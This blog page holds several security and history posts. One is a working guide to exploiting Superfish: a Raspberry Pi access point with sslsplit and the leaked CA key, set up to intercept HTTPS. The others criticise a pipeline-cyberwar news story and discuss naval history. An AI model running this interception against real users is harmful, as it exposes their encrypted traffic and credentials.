

Antenna: Computer Viruses and Hacking (BBC 1989)

Interesting BBC program warning about a “new generation of hackers” in 1989. It’s full of soundbites about computer risk:

  • I thought it would never happen to me…
  • It’s a shock when it happens to you…
  • Everywhere I’ve worked so far it’s been there…
  • I felt as if I’d been burgled…
  • I’ve become far more cautious…
  • I think everyone needs to be careful…

Posted in History, Security.


SuperFish Exploit: Kali on Raspberry Pi 2

Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.


A: Preparation of Kali

  1. Download the Kali image (462.5MB) provided by @essobi
  2. Extract kali-0.1-rpi.img.xz – I used 7-zip
  3. Verify the checksums (see the commands after this list):
    MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef
    SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6
    
  4. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
  5. Insert the SD into the RP2, connect the network and power up
  6. SSH to Kali using the default user:password (root:toor)
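
To verify the download from step 3 before writing the image, a quick hash check works on any Linux or macOS host (on Windows, certutil -hashfile does the same job; I assume the published hashes are for the compressed image):

  md5sum kali-0.1-rpi.img.xz
  sha1sum kali-0.1-rpi.img.xz

The output should match the MD5 and SHA-1 values listed in step 3.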

B: Configuration of Kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights (the sudoers sketch after this list shows the sort of line visudo needs), then I logged out and back in as the new user. After that I updated the Pi firmware and kernel (rpi-update).

  1. root@kali:~# passwd
  2. root@kali:~# adduser davi
  3. root@kali:~# visudo
  4. davi@kali:~$ sudo apt-get install curl
  5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
  6. davi@kali:~$ sudo wget https://raw.githubusercontent.com/Hexxeh/rpi-update/master/rpi-update -O /usr/bin/rpi-update
  7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
  8. davi@kali:~$ sudo rpi-update
  9. davi@kali:~$ sudo reboot
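
For step 3 (visudo), the only change needed is a line granting the new account full sudo rights. A minimal sketch, assuming the username davi from step 2:

  # added to /etc/sudoers below the existing root entry
  davi    ALL=(ALL:ALL) ALL

After saving, log out and back in as davi so the remaining steps run under that account.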

C: Configuration of the network as Robert did – follow the elinux guide for details on how to edit the files; a rough sketch of the main configs follows the list.

  1. davi@kali:~$ sudo apt-get install hostapd udhcpd
  2. davi@kali:~$ sudo vi /etc/default/udhcpd
  3. davi@kali:~$ sudo ifconfig wlan0 192.168.42.1
  4. davi@kali:~$ sudo vi /etc/network/interfaces
  5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
  6. davi@kali:~$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
  7. davi@kali:~$ sudo vi /etc/sysctl.conf
  8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  11. davi@kali:~$ sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"
  12. davi@kali:~$ sudo vi /etc/network/interfaces
  13. davi@kali:~$ sudo service hostapd start
  14. davi@kali:~$ sudo service udhcpd start
  15. davi@kali:~$ sudo update-rc.d hostapd enable
  16. davi@kali:~$ sudo update-rc.d udhcpd enable
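
For the files edited in steps 2, 4, 5, 7 and 12 the elinux guide is the authority. As a rough sketch (ssid and channel are placeholders, and the right driver depends on the wifi adapter; Realtek-based sticks like the Rosewill typically need rtl871xdrv and a patched hostapd rather than nl80211), /etc/hostapd/hostapd.conf ends up along these lines:

  interface=wlan0
  driver=nl80211
  ssid=testnet
  hw_mode=g
  channel=6
  auth_algs=1

The guide also has you put the DHCP range for the 192.168.42.0/24 network from step 3 into /etc/udhcpd.conf (not shown in the list above):

  start 192.168.42.2
  end 192.168.42.20
  interface wlan0
  opt router 192.168.42.1
  opt subnet 255.255.255.0
  opt dns 8.8.8.8

Step 2 then just comments out the DHCPD_ENABLED="no" line in /etc/default/udhcpd, and step 7 sets net.ipv4.ip_forward=1 in /etc/sysctl.conf so forwarding survives a reboot.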

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits. A quick way to sanity-check the result follows the list.

  1. davi@kali:~$ wget https://raw.githubusercontent.com/robertdavidgraham/pemcrack/master/test.pem – the raw URL matters here; the github.com blob link returns an HTML page, not the PEM
  2. davi@kali:~$ cp test.pem ca.crt
  3. davi@kali:~$ vi test.pem
  4. davi@kali:~$ vi ca.crt
  5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
  6. davi@kali:~$ sudo apt-get install sslsplit
  7. davi@kali:~$ sudo mkdir /var/log/sslsplit
  8. davi@kali:~$ sudo sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 0.0.0.0 8443 &
  9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
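
One quick way to sanity-check the intercept: connect a client to the new access point, browse to any HTTPS site, and watch the logs on the Pi:

  davi@kali:~$ tail -f connections.log
  davi@kali:~$ ls -l /var/log/sslsplit

A client that trusts the Superfish CA sees no warnings (that is the whole point of the exploit), while any other client should throw certificate errors on every HTTPS site it visits.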

Obviously Robert did all the hard work figuring this out. I’ve just tested the basics to see what it would take to set up a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple of hardware differences from Robert’s guide:

  • RP2. Cost: $35
  • 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
  • Rosewill RNX-N180UBE wireless USB with external antenna, able to do “infrastructure mode”. Cost: $21

Total cost (parts re-purposed from other projects): $35 + $18 + $21 = $74
Total time: 20 minutes


Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs           2896624 1664684   1065084  61% /
    /dev/root        2896624 1664684   1065084  61% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     460     94476   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Resize the partition:

  1. davi@kali:~$ sudo fdisk /dev/mmcblk0
  2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
  3. type “d” (delete partition)
  4. type “2” (second partition)
  5. type “n” (new partition)
  6. type “p” (primary partition)
  7. type “2” (second partition)
  8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
  9. hit “enter” to select default end number
  10. type “w” (write partition table)
  11. davi@kali:~$ sudo reboot
  12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs          30549476 1668420  27590636   6% /
    /dev/root       30549476 1668420  27590636   6% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     464     94472   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Posted in Security.


Cyberwar revisionism: 2008 BTC pipeline explosion

Over on a site called “Genius” I’ve made a few replies to other people’s comments on an old story: “Mysterious ’08 Turkey Pipeline Blast Opened New Cyberwar”

Genius offers the sort of experience where you have to believe a ton of pop-up scripts is a real improvement over plain text threads. Perhaps I don’t understand properly the value of markups and votes. So I’m re-posting my comments here in a more traditional text thread format, rather than using sticky-notes hovering over a story, not least of all because it’s easier for me to read and reference later.

Thinking about the intent of Genius, if there were an interactive interface I would rather see, the power of link-analysis and social data should be put into a 3D rotating text broken into paragraphs connected by lines from sources that you can spin through in 32-bit greyscale…just kidding.

But seriously if I have to click on every paragraph of text just to read it…something more innovative might be in order, more than highlights and replies. Let me know using the “non-genius boxes” (comment section) below if you have any thoughts on a platform you prefer.

Also I suppose I should introduce my bias before I begin this out-take of Genius (my text-based interpretation of their notation system masquerading as a panel discussion):

During the 2008 pipeline explosion I was developing critical infrastructure protection (CIP) tools to help organizations achieve reliability standards of the North American Electric Reliability Corporation (NERC). I think that makes me someone “familiar with events” although I’m never sure what journalists mean by that phrase. I studied the events extensively and even debriefed high-level people who spoke with media at the time. And I’ve been hands-on in pen-tests and security architecture reviews for energy companies.


Bloomberg: Countries have been laying the groundwork for cyberwar operations for years, and companies have been hit recently with digital broadsides bearing hallmarks of government sponsorship.

Thomas Rid: Let’s try to be precise here — and not lump together espionage (exfiltrating data); wiping attacks (damaging data); and physical attacks (damaging hardware, mostly ICS-run). There are very different dynamics at play.

Me: Agree. Would prefer not to treat every disaster as an act of war. In the world of IT the boundary between operational issues and security events (especially because software bugs are so frequent) tends to be very fuzzy. When security teams want to investigate and treat every event as a possible attack, it tends to 1) shut down or slow commerce instead of helping protect it and 2) reduce the popularity of and trust in security teams. Imagine a city full of roadblocks and checkpoints for traffic instead of streetlights and a police force that responds to accidents. Putting in place the former will have disastrous effects on commerce.
People use terms like sophisticated and advanced to spin up worry about great unknowns in security and a looming cyberwar. Those terms should be justified and defined carefully; otherwise basic operational oversights and lack of quality in engineering will turn into roadblock city.

Bloomberg: Sony Corp.’s network was raided by hackers believed to be aligned with North Korea, and sources have said JPMorgan Chase & Co. blamed an August assault on Russian cyberspies.

Thomas Rid: In mid-February the NYT (Sanger) reported that the JPMorgan investigation has not yielded conclusive evidence.

Mat Brown: Not sure if this is the one but here’s a recent Bits Blog post on the breach http://mobile.nytimes.com/blogs/bits/2014/12/23/daily-report-simple-flaw-allowed-jp-morgan-computer-breach/

Me: “FBI officially ruled out the Russian government as a culprit” and “The Russian government has been ruled out as sponsor” http://www.reuters.com/article/2014/10/21/us-cybersecurity-jpmorgan-idUSKCN0IA01L20141021

Bloomberg: The Refahiye explosion occurred two years before Stuxnet, the computer worm that in 2010 crippled Iran’s nuclear-enrichment program, widely believed to have been deployed by Israel and the U.S.

Robert Lee: Sort of. The explosion of 2008 occurred two years before the world learned about Stuxnet. However, Stuxnet was known to have been in place years before 2010 and likely in development since around 2003-2005. Best estimates/public knowledge place Stuxnet at Natanz in 2006 or 2007.

Me: Robert is exactly right. Idaho National Labs held tests called “Aurora” (over-accelerating and destroying a generator) on the morning of March 4, 2007. (https://muckrock.s3.amazonaws.com/foia_files/aurora.wmv)
By 2008 it became clear in congressional hearings that NERC had provided false information to a subcommittee in Congress on Aurora mitigation efforts by the electric sector. Tennessee Valley Authority (TVA) in particular was called vulnerable to exploit. Some called for a replacement of NERC. All before Stuxnet was “known”.

Bloomberg: National Security Agency experts had been warning the lines could be blown up from a distance, without the bother of conventional weapons. The attack was evidence other nations had the technology to wage a new kind of war, three current and former U.S. officials said.

Robert Lee: Again, three anonymous officials. Were these senior level officials that would have likely heard this kind of information in the form of PowerPoint briefings? Or were these analysts working this specific area? This report relies entirely on the evidence of “anonymous” officials and personnel. It does not seem like serious journalism.

Me: Agree. Would like to know who the experts were, given we also saw Russia dropping bombs five days later. The bombs after the fire kind of undermines the “without the bother” analysis.

Bloomberg: Stuxnet was discovered in 2010 and this was obviously deployed before that.

Robert Lee: I know and greatly like Chris Blask. But Jordan’s inclusion of his quote here in the story is odd. The timing aspect was brought up earlier and Chris did not have anything to do with this event. It appears to be an attempt to use Chris’ place in the community to add value to the anonymous sources. But Chris is just making an observation here about timing. And again, this was not deployed before Stuxnet — but Chris is right that it was done prior to the discovery of Stuxnet.

Me: Yes although I’ll disagree slightly. As the Aurora tests were in general news stories by 2008, and congress was debating TVA insecurity and NERC’s ability to honestly report risk, Stuxnet was framed to be more unique and notable than it should have been.

Bloomberg: U.S. intelligence agencies believe the Russian government was behind the Refahiye explosion, according to two of the people briefed on the investigation.

Robert Lee: It’s not accurate to say that “U.S. intelligence agencies” believe something and then source two anonymous individuals. Again, as someone that was in the U.S. Intelligence Community it consistently frustrates me to see people claiming that U.S. intelligence agencies believe things as if they were all tightly interwoven, sharing all intelligence, and believing the same things.

Additionally, these two individuals were “briefed on the investigation” meaning they had no first hand knowledge of it. Making them non-credible sources even if they weren’t anonymous.

Me: Also interesting to note the August 28, 2008 Corner House analysis of the explosion attributed it to Kurdish Rebels (PKK). Yet not even a mention here? http://www.eca-watch.org/problems/oil_gas_mining/btc/CornerHouse_re_ECGD_and%20BTC_26aug08.pdf

[NOTE: I’m definitely going to leverage Robert’s excellent nuance statements when talking about China. Too often the press will try to paint a unified political picture, despite social scientists working to parse and explain the many different perspectives inside an agency, let alone a government or a whole nation. Understanding facets means creating better controls and more rational policy.]

Bloomberg: Although as many as 60 hours of surveillance video were erased by the hackers

Robert Lee: This is likely the most interesting piece. It is entirely plausible that the cameras were connected to the Internet. This would have been a viable way for the ‘hackers’ to enter the network. Segmentation in industrial control systems (especially older pipelines) is not common — so Internet accessible cameras could have given the intruders all the access they needed.

Me: I’m highly suspicious of this claim, from experience in the field. Video often is accidentally erased or disabled. Unless there is a verified chain of malicious destruction steps, it is almost always more likely that the surveillance video system was fragile, designed wrong or poorly run.

Bloomberg: …a single infrared camera not connected to the same network captured images of two men with laptop computers walking near the pipeline days before the explosion, according to one of the people, who has reviewed the video. The men wore black military-style uniforms without insignias, similar to the garb worn by special forces troops.

Robert Lee: This is where the story really seems to fall apart. If the hackers had full access to the network and were able to connect up to the alarms, erase the videos, etc. then what was the purpose of the two individuals? For what appears to be a highly covert operation the two individuals add an unnecessary amount of potential error. To be able to disable alerting and manipulate the process in an industrial control system you have to first understand it. This is what makes attacks so hard — you need engineering expertise AND you must understand that specific facility as they are all largely unique. If you already had all the information to do what this story is claiming — you wouldn’t have needed the two individuals to do anything. What’s worse, is that two men walking up in black jumpsuits or related type outfits in the middle of the night sounds more like engineers checking the pipeline than it does special forces. This happened “days before the explosion” which may be interesting but is hardly evidence of anything.

Me: TOTALLY AGREE. I will just add that earlier we were being told “blown up from a distance, without the bother of conventional weapons” and now we’re being told two people on the ground walking next to the pipeline. Not much distance there.

Bloomberg: “Given Russia’s strategic interest, there will always be the question of whether the country had a hand in it,” said Emily Stromquist, an energy analyst for Eurasia Group, a political risk firm based in Washington.

Robert Lee: Absolutely true. “Cyber” events do not happen in a vacuum. There are almost always geopolitical or economic interests at play.

Me: I’m holding off from any conclusion it’s a cyber event. And strategic interest to just Russia? That pipeline ran across how many conflict/war zones? There was much controversy during planning. In 2003 analysts warned that the PKK were highly likely to attack it. http://www.baku.org.uk/publications/concerns.pdf

Bloomberg: Eleven companies — including majority-owner BP, a subsidiary of the State Oil Company of Azerbaijan, Chevron Corp. and Norway’s Statoil ASA — built the line, which has carried more than two billion barrels of crude since opening in 2006.

Robert Lee: I have no idea how this is related to the infrared cameras. There is a lot of fluff entered into this article.

Me: This actually supports the argument that the pipeline was complicated both in politics and infrastructure, increasing risks. A better report would run through why BP planning would be less likely to result in disaster in this pipeline compared to their other disasters, especially given the complicated geopolitical risks.

Bloomberg: According to investigators, every mile was monitored by sensors. Pressure, oil flow and other critical indicators were fed to a central control room via a wireless monitoring system. In an extra measure, they were also sent by satellite.

Robert Lee: This would be correct. There is a massive amount of sensor and alert data that goes to any control center — pipelines especially — as safety is of chief importance and interruptions of even a few seconds in data can have horrible consequences.

Me: I believe it is more accurate to say every mile was designed to be monitored by sensors. We see quite clearly from investigations of the San Bruno, California disaster (killing at least 8 people) that documentation and monitoring of lines are imperfect even in the middle of an expensive American suburban neighborhood. http://articles.latimes.com/2011/aug/30/local/la-me-0831-san-bruno-20110831

Bloomberg: The Turkish government’s claim of mechanical failure, on the other hand, was widely disputed in media reports.

Thomas Rid: A Wikileaks State Department cable refers to this event — by 20 August 2009, BP CEO Inglis was “absolutely confident” this was a terrorist attack caused by external physical force. I haven’t had the time to dig into this, but here’s the screenshot from the cable (thanks to @4Dgifts).

Me: It may help to put it into context of regional conflict at that time. Turkey started Operation Sun (Güneş Harekatı) attacking the PKK, lasting into March or April. By May the PKK had claimed retaliation by blowing up a pipeline between Turkey and Iran, which shut down gas exports for 5 days (http://www.dailystar.com.lb/News/Middle-East/2008/May-27/75106-explosion-cuts-iran-turkey-gas-pipeline.ashx). We should at least answer why BTC would not be a follow-up event.
And there have been several explosions since then as well, although I have not seen anyone map all the disasters over time. Figure an energy market analyst must have done one already somewhere.
And then there’s the Turkish news version of events: “Turkish official confirms BTC pipeline blast is a terrorist act” http://www.hurriyet.com.tr/english/finance/9660409.asp

Thomas Rid: Thanks — Very useful!

Bloomberg: “We have never experienced any kind of signal jamming attack or tampering on the communication lines, or computer systems,” Sagir said in an e-mail.

Robert Lee: This whole section seems to heavily dispute the assumption of this article. There isn’t really anything in the article presented to dispute this statement.

Me: Agree. The entire article goes to lengths to make a case using anonymous sources. Mr. Sagir is the best source so far and says there was no tampering detected. Going back to the surveillance cameras, perhaps they were accidentally erased or non-functioning due to error.

Bloomberg: The investigators — from Turkey, the U.K., Azerbaijan and other countries — went quietly about their business.

Robert Lee: This is extremely odd. There are not many companies who have serious experience with incident response in industrial control system scenarios. Largely because industrial control system digital forensics and incident response is so difficult. Traditional information technology networks have lots of sources of forensic data — operations technology (industrial control systems) generally do not.

The investigators coming from one team that works and has experience together adds value. The investigators coming from multiple countries sounds impressive but on the ground level actually introduces a lot of confusion and conflict as the teams have to learn to work together before they can even really get to work.

Me: Agree. The pipeline would see not only confusion in the aftermath, it also would find confusion in the setup and operation, increasing chance of error or disaster.

Bloomberg: As investigators followed the trail of the failed alarm system, they found the hackers’ point of entry was an unexpected one: the surveillance cameras themselves.

Robert Lee: How? This is a critical detail. As mentioned before, incident response in industrial control systems is extremely difficult. The Industrial Control System — Computer Emergency Response Team (ICS-CERT) has published documents in the past few years talking about the difficulty and basically asking the industry to help out. One chief problem is that control systems usually do not have any ability to perform logging. Even in the rare cases that they do — it is turned off because it uses too much storage. This is extremely common in pipelines. So “investigators” seem to have found something but it is nearly outside the realm of possible that it was out in the field. If they had any chance of finding anything it would have been on the Windows or Linux systems inside the control center itself. The problem here is that wouldn’t have been the data needed to prove a failed alarm system.

It is very likely the investigators found malware. That happens a lot. They likely figured the malware had to be linked to the blast. This is a natural assumption but extremely flawed based on the nature of these systems and the likelihood of random malware being inside of a network.

Me: Agree. Malware noticed after disaster becomes very suspicious. I’m most curious why anyone would setup surveillance cameras for “deep into the internal network” access. Typically cameras are a completely isolated/dedicated stack of equipment with just a browser interface or even dedicated monitors/screens. Strange architecture.

Bloomberg: The presence of the attackers at the site could mean the sabotage was a blended attack, using a combination of physical and digital techniques.

Robert Lee: A blended cyber-physical attack is something that scares a lot of people in the ICS community for good reason. It combines the best of two attack vectors. The problem in this story though is that apparently it was entirely unneeded. When a nation-state wants to spend resources and talents to do an operation — especially when they don’t want to get caught — they don’t say “let’s be fancy.” Operations are run in the “path of least resistance” kind of fashion. It keeps resource expenditures down and keeps the chance of being caught low. With everything discussed as the “central element of the attack” it was entirely unneeded to do a blended attack.

Me: What really chafes my analysis is that the story is trying to build a scary “entirely remote attack” scenario while simultaneously trying to explain why two people are walking around next to the pipeline.
Also agree attackers are like water looking for cracks. Path of least resistance.

Bloomberg: The super-high pressure may have been enough on its own to create the explosion, according to two of the people familiar with the incident.

Robert Lee: Another two anonymous sources.

Me: And “familiar with the incident” is a rather low bar.

Bloomberg: Having performed extensive reconnaissance on the computer network, the infiltrators tampered with the units used to send alerts about malfunctions and leaks back to the control room. The back-up satellite signals failed, which suggested to the investigators that the attackers used sophisticated jamming equipment, according to the people familiar with the probe.

Robert Lee: If the back-up satellite signal failed in addition to alerts not coming from the field (these units are polled every few seconds or minutes depending on the system) there would have been an immediate response from the personnel unless they were entirely incompetent or not present (in that case this story would be even less likely). But jamming satellite links is an even extra level of effort beyond hacking a network and understanding the process. If this was truly the work of Russian hackers they are not impressive for all the things they accomplished — they were embarrassingly bad at how many resources and methods they needed to accomplish this attack when they had multiple ways of accomplishing it with any one of the 3-4 attack vectors.

Me: Agree. The story reads to me like conventional attack, known to be used by PKK, causes fire. Then a series of problems in operations are blamed on super-sophisticated Russians. “All these systems not working are the fault of elite hackers”

Bloomberg: Investigators compared the time-stamp on the infrared image of the two people with laptops to data logs that showed the computer system had been probed by an outsider.

Robert Lee: “Probed by an outsider” reveals the system to be an Internet connected system. “Probes” is a common way to describe scans. Network scans against publicly accessible devices occur every second. There is a vast amount of research and public information on how often Internet scans take place (usually a system begins to be scanned within 3-4 seconds of being placed online). It would have been more difficult to find time-stamps in any image that did not correlate to probing.

Me: Also, is there high trust in time-stamps? Accurate time is hard. Looking at the various scenarios (attackers had the ability to tamper, operations did a poor job with systems), how reliable should we consider a time-stamp-based correlation?

Bloomberg: Years later, BP claimed in documents filed in a legal dispute that it wasn’t able to meet shipping contracts after the blast due to “an act of terrorism.”

Robert Lee: Which makes sense due to the attribution the extremists claimed.

Me: I find this sentence mostly meaningless. My guess is BP was using legal or financial language because of the constraints in court. Would have to say terrorism, vandalism, etc. to speak appropriately given precedent. No lawyer wants to use a new term and establish new norms/harm when they can leverage existing work.

Bloomberg: A pipeline bombing may fit the profile of the PKK, which specializes in extortion, drug smuggling and assaults on foreign companies, said Didem Akyel Collinsworth, an Istanbul-based analyst for the International Crisis Group. But she said the PKK doesn’t have advanced hacking capabilities.

Robert Lee: This actually further disproves the article’s theory. If the PKK took credit, the company believed it to be them, the group does not possess hacking skills, and specialists believe this attack was entirely their style — then it was very likely not hacking related.

Me: Agree. Wish this pipeline explosion would be put in context of other similar regional explosions, threats from the PKK that they would attack pipelines and regional analyst warnings of PKK attacks.

Bloomberg: U.S. spy agencies probed the BTC blast independently, gathering information from foreign communications intercepts and other sources, according to one of the people familiar with the inquiry.

Robert Lee: I would hope so. There was a major explosion in a piece of critical infrastructure right before Russia invaded Georgia. If the intelligence agencies didn’t look into it they would be incompetent.

Me: Agree. Not only for defense, also for offense knowledge, right? Would be interesting if someone said they probed it differently than the other blasts, such as the one three months earlier between Turkey and Iran.

Bloomberg: American intelligence officials believe the PKK — which according to leaked State Department cables has received arms and intelligence from Russia — may have arranged in advance with the attackers to take credit, the person said.

Robert Lee: This is all according to one, yet again, anonymous source. It is extremely far fetched. If Russia was going to go through the trouble of doing a very advanced and covert cyber operation (back in 2008 when these types of operations were even less publicly known) it would be very out of character to inform an extremist group ahead of time.

Me: Agree, although also plausible to tell a group a pipeline would be blown up without divulging method. Then the group claims credit without knowing method. The disconnect I see is Russia trying to bomb the same pipeline five days later. Why go all conventional if you’ve owned the systems and can remotely do what you like?

Bloomberg: The U.S. was interested in more than just motive. The Pentagon at the time was assessing the cyber capabilities of potential rivals, as well as weaknesses in its own defenses. Since that attack, both Iran and China have hacked into U.S. pipeline companies and gas utilities, apparently to identify vulnerabilities that could be exploited later.

Robert Lee: The Pentagon is always worried about these types of things. President Clinton published PDD-63 in 1998 talking about these types of vulnerabilities and they have been assessing and researching at least since then. There is also no evidence provided about the Iranian and Chinese hacks claimed here. It’s not that these types of things don’t happen — they most certainly do — it’s that it’s not responsible or good practice to cite events because “we all know it’s happening” instead of actual evidence.

Me: Yes; explaining the major disasters already happening and the focus of congressional work (2008 TVA) would be a better perspective for this section. August 2003 was a sea change in bulk power risk assessment. Talking about Iran and China seems like empty/idle speculation in comparison: http://www.nerc.com/pa/rrm/ea/Pages/Blackout-August-2003.aspx

Bloomberg: As tensions over the Ukraine crisis have mounted, Russian cyberspies have been detected planting malware in U.S. systems that deliver critical services like electricity and water, according to John Hultquist, senior manager for cyber espionage threat intelligence at Dallas-based iSight Partners, which first revealed the activity in October.

Robert Lee: It’s not that I doubt this statement, or John, but this is another bad trend in journalism. Using people that have a vested interest in these kinds of stories for financial gain is a bad practice in the larger journalism community. iSight Partners offer cybersecurity services and specialize in threat intelligence. So to talk about ‘cyberspies’, ‘cyber espionage’, etc. is something they are financially motivated to hype up. I don’t doubt the credibility or validity of John’s statements but there’s a clear conflict of interest that shouldn’t be used in journalism, especially when there are no named sources with first-hand knowledge of the event.

Me: Right! Great point Robert. Reads like free advertising for threat intelligence company X rather than trusted analysis. Would mind a lot less if a non-sales voice was presented with a dissenting view, or the journalist added in caution about the source being of a particular bias.
Also what’s the real value of this statement? As a crisis with Russia unfolds, we see Russia being more active/targeted. Ok, but what does this tell us about August 2008? No connection is made. Reader is left guessing.

Bloomberg: The keyboard was the better weapon.

Robert Lee: The entire article is focused on anonymous sources. In addition, the ‘central element of the attack’ was the computer intrusion which was analyzed by incident responders. Unfortunately, incident response in industrial control systems is at such a juvenile state that even if there were a lot of data, which there never is, it is hard to determine what it means. Attribution is difficult (look at the North Korea and Sony case where much more data was available including government level resources). This story just doesn’t line up.

When journalism reports on something it acknowledges would be history changing, better information is needed. When those reports stand to increase hype and tension between nation-states in already politically tense times (Ukraine, Russia, Turkey, and the U.S.), not including actual evidence is just irresponsible.

Me: Agree. It reads like a revision of history, so perhaps that’s why we’re meant to believe it’s “history changing.” I’m ready to see evidence of a hack, yet after six years we have almost nothing to back up these claims. There is better detail about what happened from journalists writing at the time.
Also, if we are to believe the conclusion that keyboards are the better weapon, why have two people walking along the pipeline and why bomb infrastructure afterwards? Would Russia send a letter after making a phone call? If you look carefully at what Georgia DID NOT accuse Russia of, it was hacking critical infrastructure.
Lack of detailed evidence, anonymous attribution, generic/theoretical statements about infrastructure vulnerability, no contextual explanations…there is little here to believe the risk was more than operational errors coupled with a targeted PKK campaign against pipelines.

Posted in Energy, History, Security.


Eventually Navies Take Over

I attended a “keynote” talk at a security conference a few years ago with this title as a key premise. You know how I love history, so I was excited. The speaker, a well-regarded mathematician, told us “eventually, navies take over” because they will “perform tight surveillance of sea lanes and ensure safety for commerce”.

That sounded counter-factual to me, given what history tells us about rigid empires trying to oppress and control markets. So while I enjoyed the topic I noted some curious issues with this presentation perspective.

Common sense tells me authorities have historically struggled to stem a shift to nimbler, lighter and more open commerce lanes. Authoritarian models struggle for good reasons. Shipping routes protected by a Navy basically are a high tax that does not scale well, requiring controversial forms of “investment”.

This comes up all the time in security history circles. A “security tax” becomes an increasing liability because scaling perimeters is hard (the same way castles could not scale to protect trade on land); an expensive perimeter-based model, as it grows, actually helps accelerate the demise of the empire that wants to stay in power. Perhaps we could even say navies trying to take over is the last straw for an enterprise gasping to survive as cloud services roll in…

Consider that the infamous Spanish navy “flota” model — a highly guarded and very large shipment — seems an expensive disaster waiting to happen. Its failure is not in an inability to deliver stuff from point A to B. The failure is in sustainability; an inability to stop competitive markets from forming with superior solutions (like the British version that came later trying to prevent American encroachment). The flota was an increased cost to maintain a route, which obsoleted itself.

Back to the keynote presentation: it pointed out that an attacker (e.g. the British) could make a large haul. This seems an odd point to make. Such a large haul was the effect of the flota, the perimeter model. There was a giant load of assets to be attacked, because it was an annual batch job. The British could take a large haul if they won, by design.

In defense of the flota model, the frequency of failure was low over many years. If we measure success simply on whether some shipments were profitable, it looks a lot better. This seems to me like saying Blockbuster was a success, so eventually video rental stores (brick-and-mortar) take over. It sounds like going backwards in time, not forward. The Spanish had a couple hundred years of shipments that kept the monarchy running, which may impress us just like the height of Blockbuster sales. To put it in infosec terms, should we say a perimeter model eventually will take over because it was used by company X to protect its commerce?

On the other hand the Eighty Years’ and Thirty Years’ wars that Spain lost put the flota timeline in a different perspective. Oppressive extraction and taxes to maintain a navy that was increasingly overstretched and vulnerable, a period of expensive wars and leaks…in relative terms, this was not exactly a long stretch of smooth sailing.

More to the point, in peacetime the navy simply could not build a large enough presence to police all the leaks to pervasive draconian top-down trading rules. People naturally smuggled and expanded around navies or when they were not watching. We saw British and Dutch trade routes emerge out of these failures. And in wartime a growth in privateers increased difficulty for navies to manage routes against competition because the navy itself was targeted. Thus in a long continuum it seems we move towards openness until closed works out a competitive advantage. Then openness cracks the model and out-competes until…and so on. If we look at this keynote’s lesson from a Spanish threat to “take over” what comes to mind is failure; otherwise wouldn’t you be reading this in Spanish?

Hopefully this also puts into context why by 1856 America refused to ban “letters of marque” (despite European nations doing so in the Paris Declaration). US leadership expressly stated it would never want or need a permanent/standing navy (it believed privateers would be its approach to any dispute with a European military). The young American country did not envision having its own standing navy perhaps because it saw no need for the relic of unsustainable and undesirable closed markets. The political winds changed quite a bit for the US in 1899 after dramatic defeats of Spain but that’s another topic.

The conference presentation also unfortunately used some patently misleading statements like “pirates that refused to align with a government…[were] eventually executed”. I took that to mean the presenter was saying a failure to choose to serve a nation, a single one at that, would be a terminal risk for any mercenary or pirate. And I don’t believe that to be true at all.

We know some pirates, perhaps many, avoided being forced into alignment through their career and then simply retired on terms they decided. Peter Easton, a famous example, bought himself land with a Duke’s title in France. Duke Easton’s story has no signs of coercion or being forced to align. It sounds far more like a retirement agreement of his choosing. The story of “Wife of Cheng” is another example. Would you call her story the alignment of a pirate with a government, or a government aligning with the pirate? She clearly refused to align and was not executed.

Cheng I Sao repelled attack after attack by both the Chinese navy and the many Portuguese and British bounty hunters brought in to help capture her. Then, in 1810, the Chinese government tried a different tactic — they offered her universal pirate amnesty in exchange for peace.

Cheng I Sao jumped at the opportunity and headed for the negotiating table. There, the pirate queen arranged what was, all told, a killer deal. Fewer than 400 of her men received any punishment, and a mere 126 were executed. The remaining pirates got to keep their booty and were offered military jobs.

Describing pirates’ options as a binary align-or-be-executed is crazy when you also put it in the frame of carrying dual or more allegiances. One of the most famous cases in American history involves ships switching flags to the side winning at sea in order to get a piece of the spoils on their return to the appropriate port. The situation, in brief, unfolded (pun not intended) when two American ships came upon an American ship defeating a British one. The two approaching ships switched to British flags, chased off the American, took the British ship captive, switched flags back to American and split the reward from America under “letters of marque”. Eventually in court the wronged American ship proved the situation and credit was restored. How many cases went unknown?

